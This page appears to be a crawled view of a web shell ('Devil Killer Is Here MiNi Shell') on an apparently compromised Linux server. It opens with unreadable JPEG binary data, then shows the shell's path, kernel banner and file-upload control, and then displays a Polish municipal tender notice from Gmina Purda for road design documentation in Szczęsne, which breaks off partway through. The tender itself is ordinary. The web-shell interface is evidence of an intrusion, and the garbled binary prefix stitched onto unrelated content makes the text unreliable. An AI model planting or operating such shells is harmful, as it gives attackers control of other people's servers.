JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240222/0021477501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dokumentacja projektowo-kosztorysowa przebudowy dróg gminnych w m. Szczęsne </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PURDA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743189</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Purda 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Purda</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-030</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 89 512 22 23</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@purda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.purda.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dokumentacja projektowo-kosztorysowa przebudowy dróg gminnych w m. Szczęsne </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5ff2be5d-d165-11ee-875e-a22221c84ba7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00214775</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00004597/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wykonanie dokumentacji projektowo-kosztorysowej przebudowy dróg gminnych w miejscowości Szczęsne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5ff2be5d-d165-11ee-875e-a22221c84ba7 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>Robert Bąk – co do procedury zamówienia - tel. 89 544 42 37.<br/>Irena Derdoń – co do opisu przedmiotu zamówienia - tel. 89 544 42 70.<br/><br/>Ze względu na ograniczoną ilość znaków, pełny opis dot. środków komunikacji elektronicznej, przy użyciu których zamawiający<br/>będzie komunikował się z wykonawcami opisany jest w Rozdziale XIV SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne zostały szczegółowo opisane w SWZ przedmiotowego postępowania oraz Regulaminie Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>▪ administratorem Pani/Pana danych osobowych jest Gmina Purda, Purda 19, 11-030 Purda;<br/>▪ inspektorem ochrony danych osobowych w Gminie Purda jest Pan Michał Stokłos, e-mail: iod@purda.pl;<br/>▪ Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego ZP.271.6.2024 prowadzonym w trybie podstawowym;<br/>▪ odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r., poz. 1605 z późn. zm.), dalej „ustawa Pzp”;<br/>▪ Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza <br/>4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>▪ obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają <br/>z ustawy Pzp;<br/>▪ w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>▪ posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>▪ nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej przebudowy dróg gminnych w m. Szczęsne:<br/><br/>Część I - Dokumentacja projektowo-kosztorysowa przebudowy ul. Akacjowej.<br/><br/>Droga objęta zakresem opracowania o długości 290 m szer. 5 m. Początek drogi gminnej przyjęto od skrzyżowania z drogą powiatową dz. 102/7 obr. Szczęsne do końca działki 263/37 (granica styku z działką nr 267/47). Zakres objęty dokumentacją techniczną przedstawia załącznik graficzny – Załącznik nr 5 do SWZ.<br/>Projektowana droga o nawierzchni jezdni z kostki betonowej wraz z obustronnymi poboczami, dojściami do furtek, wjazdami na nieruchomości oraz zjazdami na drogi wewnętrzne. Kategoria ruchu KR2, zakładana prędkość na terenie zabudowy 40 km/h.<br/>Zaprojektować należy odwodnienie drogi poprzez wpusty do zaprojektowanej kanalizacji deszczowej <br/>w ul. Akacjowej (Załącznik nr 5 do SWZ).<br/>W liniach rozgraniczających występują: podziemna linia energetyczna, doziemna linia telekomunikacyjna, sieć wodociągowa, kanalizacja sanitarna.<br/>Zaprojektować przebudowę kolizji z istniejącą infrastrukturą techniczną zgodnie z warunkami wydanymi przez dysponentów sieci.<br/>Należy również sporządzić projekt stałej organizacji ruchu – uwzględniając przede wszystkim skrzyżowania z drogami wewnętrznymi. Zaprojektować należy ustawienie znaków pionowych z grupy wielkości „małe” <br/>z tarczami pokrytymi folią odblaskową typu II. <br/>Obszar przyjęty do opracowaniem nie jest objęty miejscowego planu zagospodarowania przestrzennego.<br/><br/>ETAP 1 – zakres prac:<br/>Mapa do celów projektowych – 2 kpl.,<br/>Przygotowanie mapy sytuacyjno-wysokościowej do celów projektowych. Mapa do celów projektowych w swojej treści musi zawierać ustalone granice działek ewidencyjnych z dokładnością właściwą dla szczegółów terenowych I grupy, usytuowanie drzew i krzewów, pozostałych urządzeń i budowli oraz bezwzględnie całą podziemną infrastrukturę techniczną. <br/>Opinia Geotechniczna – 2 kpl.,<br/>Opracowanie projektu koncepcyjnego przebudowy drogi wraz z opisem rozwiązań technicznych – 2 kpl.<br/><br/>ETAP 2 – zakres prac:<br/>• Opracowanie kompletnego projektu budowlanego (projektu zagospodarowania działki lub terenu, projektu architektoniczno-budowlanego), projektu technicznego, wykonawczego oraz opinii, uzgodnień, pozwoleń i innych dokumentów o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. 2023 r. poz. 682 ze zm.) wraz z niezbędnymi branżami z uwzględnieniem przebudowy istniejących urządzeń odwadniających jeśli jest wymagana oraz z uwzględnieniem, w przypadku wystąpienia kolizji, wykonania ewentualnych przełożeń/rur ochronnych/wykonania nowych odcinków istniejącej infrastruktury zgodnie z warunkami wydanymi przez Właściciela lub zarządcę sieci kolidującej – 5 kpl., <br/>• Opracowanie wszelkich niezbędnych dokumentów wymaganych w celu uzyskania stosownych decyzji, uzgodnień i pozwoleń umożliwiających prowadzenie robót budowlanych,<br/>• W razie konieczności również inne ekspertyzy, opracowania, raporty, operaty, opracowania dendrologiczne oraz inne dokumentacje i decyzje administracyjne niezbędne dla zaprojektowania, wybudowania, w tym zgłoszenie/pozwolenia na budowę/ZRiD uruchomienia np. pozwolenie na zajęcie pasa drogowego, pozwolenie na objazdy, na prowadzenie drogi, na rozpoczęcie prac i na zakrycie robót zanikających przy przebudowie obiektów istniejących,<br/>• Opracowanie projektu organizacji ruchu wraz z niezbędnymi opiniami – 5 kpl.,<br/>• Kosztorys inwestorski wraz z przedmiarem robót (dla każdej branży osobno) – 2 kpl.,<br/>Kosztorys zapisany w pdf. oraz w wersji edytowalnej do programu kosztorysowego posiadanego przez Zamawiającego. Kosztorys inwestorski opracowany zgodnie z Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym<br/>• Specyfikacji technicznych wykonania i odbioru robot budowlanych (STWiORB) – 2 kpl.,<br/>Dokumentacja projektowa powinna spełniać w szczególności wymogi określone w wymaganiach ustawy Prawo budowlane (Dz. U. z 2023 r. poz. 682), Rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2021 r., poz. 2454) i w zakresie wynikającym z Rozporządzenia Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2022 poz. 1679). <br/>Wykonawca dostarczy dokumentację w formie papierowej i elektronicznej zapisanej: - część tekstowa w pdf. i edytowalnej oraz część rysunkową w pdf i dwg. Dokumentacja w wersji elektronicznej powinna być spójna z dokumentacją w wersji papierowej tj. zachowana kolejność stron oraz wszystkie załączniki, opnie, sprawdzenia, uzgodnienia, które wchodzą w jej skład. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującym kryterium i jego znaczeniem:<br/>1. Kryterium wyboru najkorzystniejszej oferty jest najniższa cena brutto wyrażona w PLN.<br/>Cena* – Wc (waga 60), proporcjonalnie wg wzoru:<br/><br/>Wartość całkowita kryterium Cena<br/><br/> najniższa cena brutto z ofert<br/>Wc = ––––––––––––––––––––––––––––––––––––––– x 60<br/> cena brutto oferty badanej<br/><br/>* w przypadku podmiotów zagranicznych, które na podstawie odrębnych przepisów, nie są zobowiązane do<br/>uiszczenia podatku VAT w kraju i ich oferty zawierają cenę z 0% stawką podatku VAT, Zamawiający dokonując oceny ofert w kryterium ceny dla porównania tych ofert doliczy do ceny ofertowej podmiotów zagranicznych, kwotę należnego, obciążającego Zamawiającego z tytułu realizacji umowy, podatku VAT oraz cła.<br/><br/>2. Doświadczenia osoby wyznaczonej do realizacji zamówienia (Wd) – (waga 40)<br/><br/>Doświadczenie projektanta z branży drogowej 3 lata – 0 punktów<br/>Doświadczenie projektanta z branży drogowej 4-5 lat – 20 punktów<br/>Doświadczenie projektanta z branży drogowej 6 lat i więcej – 40 punktów<br/><br/>Oferty w tym kryterium oceniane będą w odniesieniu do doświadczenia projektanta przedstawionego przez Wykonawców zastrzegając, iż minimalne doświadczenie projektanta to 3 lata. W sytuacji, gdy Wykonawca nie wskaże w ofercie doświadczenia projektanta lub wskaże doświadczenie mniejsze niż 3 lata, oferta taka zostanie odrzucona jako niezgodna z warunkami zamówienia. W przypadku gdy Wykonawca wykaże doświadczenie projektanta 4-5 lat, oferta taka otrzyma 20 pkt. W przypadku gdy Wykonawca wykaże w formularzu ofertowym doświadczenie projektanta 6 lat lub większe, oferta taka otrzyma 40 pkt. Informacje dotyczące doświadczenia projektanta Wykonawca poda w Formularzu Oferta – Załączniku nr 2 do SWZ. Maksymalna liczba punktów możliwych do uzyskania w tym kryterium to 40 pkt.<br/><br/>3. Całkowita punktowa wartość oferty liczona będzie wg wzoru: W = Wc + Wd.<br/>1) W oparciu o powyższe kryteria opisane wzorem zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejsza ofertę.<br/>2) Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.<br/>3) Jeżeli zostanie złożona oferta, której wybór prowadzić będzie do powstania obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz wspólnotowego nabycia towarów, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który będzie miał obowiązek wpłacić zgodnie z obowiązującymi przepisami.<br/>4) W przypadku złożenia oferty przez Wykonawcę mającego swoją siedzibę w kraju spoza obszaru Unii<br/>Europejskiej, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny różnicę w kwocie należnego podatku VAT oraz pozostałych należności, których obowiązek uiszczenia spoczywa na Zamawiającym, wynikających z innych przepisów, w tym celnych.<br/>5) Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku.<br/>6) Komisja wybiera ofertę najkorzystniejszą, przez co należy rozumieć ofertę, która otrzyma największą liczbę punktów.<br/>4. Sposób oceny ofert.<br/>Przy ocenie ofert i wyborze oferty najkorzystniejszej komisja przetargowa będzie postępować zgodnie z wymaganiami ustawy oraz kierować się przesłanką określoną w kryterium oceny ofert.<br/><br/>Ze względu na ograniczoną ilość znaków, pełny opis dot. sposobu oceny ofert zawarty jest w Rozdziale XXII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta z branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej przebudowy dróg gminnych w m. Szczęsne:<br/><br/>Część II- Dokumentacja projektowo-kosztorysowa przebudowy ul. Wrzosowej.<br/><br/>Droga objęta zakresem opracowania o długości 420 m szer. 5 m. Początek drogi gminnej przyjęto od skrzyżowań z ul. Akacjową do końca działki 263/37 (granica styku z działką nr 267/77 i dz. 263/3). Zakres objęty dokumentacją techniczną przedstawia załącznik graficzny – Załącznik nr 5 do SWZ.<br/>Projektowana droga o nawierzchni jezdni z kostki betonowej wraz z obustronnymi poboczami, dojściami do furtek, wjazdami na nieruchomości oraz zjazdami na drogi wewnętrzne. Kategoria ruchu KR2, zakładana prędkość na terenie zabudowy 40 km/h.<br/>Zaprojektować należy odwodnienie drogi poprzez wpusty do zaprojektowanej kanalizacji deszczowej w ul. Wrzosowej (Załącznik nr 5 do SWZ).<br/>W liniach rozgraniczających występują: podziemna linia energetyczna, doziemna linia telekomunikacyjna, sieć wodociągowa, kanalizacja sanitarna.<br/>Zaprojektować przebudowę kolizji z istniejącą infrastrukturą techniczną zgodnie z warunkami wydanymi przez dysponentów sieci.<br/>Należy również sporządzić projekt stałej organizacji ruchu – uwzględniając przede wszystkim skrzyżowania z drogami wewnętrznymi. Zaprojektować należy ustawienie znaków pionowych z grupy wielkości „małe” z tarczami pokrytymi folią odblaskową typu II. <br/>Obszar przyjęty do opracowaniem nie jest objęty miejscowego planu zagospodarowania przestrzennego.<br/><br/>ETAP 1 – zakres prac:<br/>Mapa do celów projektowych – 2 kpl.,<br/>Przygotowanie mapy sytuacyjno-wysokościowej do celów projektowych. Mapa do celów projektowych w swojej treści musi zawierać ustalone granice działek ewidencyjnych z dokładnością właściwą dla szczegółów terenowych I grupy, usytuowanie drzew i krzewów, pozostałych urządzeń i budowli oraz bezwzględnie całą podziemną infrastrukturę techniczną. <br/>Opinia Geotechniczna – 2 kpl.,<br/>Opracowanie 